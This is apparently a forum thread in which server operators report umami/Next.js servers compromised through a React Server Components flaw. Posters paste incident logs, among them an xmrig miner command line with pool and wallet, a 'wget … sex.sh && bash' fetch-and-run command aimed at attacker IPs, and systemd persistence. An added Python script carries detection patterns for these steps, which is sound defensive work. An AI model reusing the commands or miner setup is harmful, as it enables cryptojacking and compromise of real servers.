
The server's CPU alert went off; I took a look and found a mining process:
root 2380791 30.6 13.5 312304 272324 ? Tsl 06:05 1:27 /root/umami/xmrig-6.24.0/xmrig --url pool.hashvault.pro:443 --user 8BWy7pgane96sLATF7nESM4ehZEtYAFNpYFAm88zftVsJ5jxFBdGVBrd1igptedXejfomPEpJvGUKU1etmkNBXmU5HkPR6e --pass ZimbabveDC --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
The server runs umami, a website analytics tool that uses React / Next.js server. The vulnerability had only just been reported, and today it was already scanned and hit... The black-market crowd is very efficient.
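1 lemoncoconut 19 hours 39 minutes ago Thanks, OP. I upgraded umami right away. |
2 lizhenda 19 hours 28 minutes ago How much can a mining trojan even earn these days? |
3 ponycool 19 hours 25 minutes ago CVE-2025-55182 CVSS 10.0 https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components |
4 dianso 19 hours 23 minutes ago I already got the tool last Sunday and didn't expect it to be disclosed this week. Lost a few hundred U. |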
5 fwh 19 hours 23 minutes ago Same here. A few extra files, sex.sh and xmrig, showed up in my nextjs project directory. This is the pm2 log; I have no idea how the attack was carried out.
2025-12-05T13:20:27: --2025-12-05 13:18:47-- http://46.36.37.85:12000/sex.sh
2025-12-05T13:20:27: Connecting to 46.36.37.85:12000... connected.
2025-12-05T13:20:27: HTTP request sent, awaiting response... 200 OK
2025-12-05T13:20:27: Length: 1621 (1.6K) [application/x-sh]
2025-12-05T13:20:27: Saving to: ‘sex.sh’
2025-12-05T13:20:27:
2025-12-05T13:20:27: 0K . 100% 171M=0s
2025-12-05T13:20:27:
2025-12-05T13:20:27: 2025-12-05 13:18:47 (171 MB/s) - ‘sex.sh’ saved [1621/1621]
2025-12-05T13:20:27:
2025-12-05T13:20:27: % Total % Received% Xferd Average Speed Time Time Time Current
2025-12-05T13:20:27: Dload Upload Total Spent Left Speed
2025-12-05T13:20:27: 98 3439k 98 3400k 0 0 35755 0 0:01:38 0:01:37 0:00:01 26312 99 3439k 99 3426k 0 0 35697 0 0:01:38 0:01:38 --:--:-- 23629 100 3439k 100 3439k 0 0 35653 0 0:01:38 0:01:38 --:--:-- 24491
2025-12-05T13:20:27: Created symlink /etc/systemd/system/multi-user.target.wants/system-update-service.service → /etc/systemd/system/system-update-service.service.
2025-12-05T13:20:28: --2025-12-05 13:20:27-- http://46.36.37.85:12000/sex.sh
2025-12-05T13:20:28: Connecting to 46.36.37.85:12000... connected.
2025-12-05T13:20:28: HTTP request sent, awaiting response... 200 OK
2025-12-05T13:20:28: Length: 1621 (1.6K) [application/x-sh]
2025-12-05T13:20:28: Saving to: ‘sex.sh.1’
2025-12-05T13:20:28:
2025-12-05T13:20:28: 0K . 100% 198M=0s
2025-12-05T13:20:28:
2025-12-05T13:20:28: 2025-12-05 13:20:27 (198 MB/s) - ‘sex.sh.1’ saved [1621/1621]
2025-12-05T13:20:28: |
6 Nanosk 19 hours 5 minutes ago @fwh
[TypeError: Failed to parse body as FormData.]
[TypeError: Cannot read properties of undefined (reading 'workers')]
[TypeError: Cannot read properties of undefined (reading 'workers')]
[TypeError: Cannot read properties of undefined (reading 'workers')]
Connecting to 216.158.232.43:12000 (216.158.232.43:12000)
saving to 'sex.sh'
sex.sh 100% |********************************| 1615 0:00:00 ETA
'sex.sh' saved
/bin/sh: bash: not found
[Error: Command failed: wget http://216.158.232.43:12000/sex.sh && bash sex.sh
Connecting to 216.158.232.43:12000 (216.158.232.43:12000)
saving to 'sex.sh'
sex.sh 100% |********************************| 1615 0:00:00 ETA
'sex.sh' saved
/bin/sh: bash: not found
] { status: 127, signal: null, output: [Array], pid: 46, stdout: <Buffer >, stderr: <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 31 36 2e 31 35 38 2e 32 33 32 2e 34 33 3a 31 32 30 30 30 20 28 32 31 36 2e 31 35 38 2e 32 33 32 2e 34 33 ... 147 more bytes>, digest: '4032595826' }
Pretty much the same, but it couldn't execute because the container has no bash. |
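Added example, not written by any poster in this thread: a small log triage pass that flags the patterns visible in the pm2 and container logs of posts 5 and 6, and separates "script fetched but never ran" (post 6) from "payload ran and persisted" (post 5). The rule names, the `verdict` heuristic and the sample lines are assumptions of this example; the sample uses a documentation IP and made-up file names.

```python
import re

# Patterns come from the log excerpts in posts 5 and 6; rule names are this example's own.
RULES = [
    ("rsc-parse-error", re.compile(r"Failed to parse body as FormData")),
    ("script-from-raw-ip",
     re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S+\.sh\b")),
    ("download-and-exec",
     re.compile(r"\b(?:wget|curl)\b[^\n]*?(?:&&|\||;)\s*(?:ba)?sh\b")),
    ("systemd-persistence",
     re.compile(r"Created symlink /etc/systemd/system/\S+\.wants/\S+\.service")),
    ("miner", re.compile(r"\bxmrig\b|--donate-level", re.I)),
]

def triage(lines):
    """Return (line_no, rule_name, text) for every rule hit, in log order."""
    hits = []
    for no, line in enumerate(lines, 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((no, name, line.strip()))
    return hits

def verdict(hits):
    """Heuristic: 'executed' if persistence or a miner shows up,
    'attempted' if a script was only fetched or launched, else 'clean'."""
    names = {name for _, name, _ in hits}
    if names & {"systemd-persistence", "miner"}:
        return "executed"
    if names & {"download-and-exec", "script-from-raw-ip"}:
        return "attempted"
    return "clean"  # assumption: a parse error on its own is not enough to alert

# Constructed sample lines (documentation IP 203.0.113.7, made-up file names).
SAMPLE_CONTAINER = [
    "[TypeError: Failed to parse body as FormData.]",
    "[Error: Command failed: wget http://203.0.113.7:12000/x.sh && bash x.sh",
    "/bin/sh: bash: not found",
]
SAMPLE_HOST = [
    "2025-01-01T00:00:00: --2025-01-01 00:00:00-- http://203.0.113.7:12000/x.sh",
    "2025-01-01T00:00:01: Created symlink /etc/systemd/system/"
    "multi-user.target.wants/example.service",
]

if __name__ == "__main__":
    for label, log in (("container", SAMPLE_CONTAINER), ("host", SAMPLE_HOST)):
        hits = triage(log)
        print(label, verdict(hits), [(no, name) for no, name, _ in hits])
```

An "attempted" result still means the request reached code that spawned a shell command, so the application needs the upgrade even where the payload failed to run.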
7 zhangyunlu80 18 hours 60 minutes ago react2shell, go upgrade. |
8 cnhongwei 18 hours 53 minutes ago I run it with Docker and use the page router; that should be fine, right? |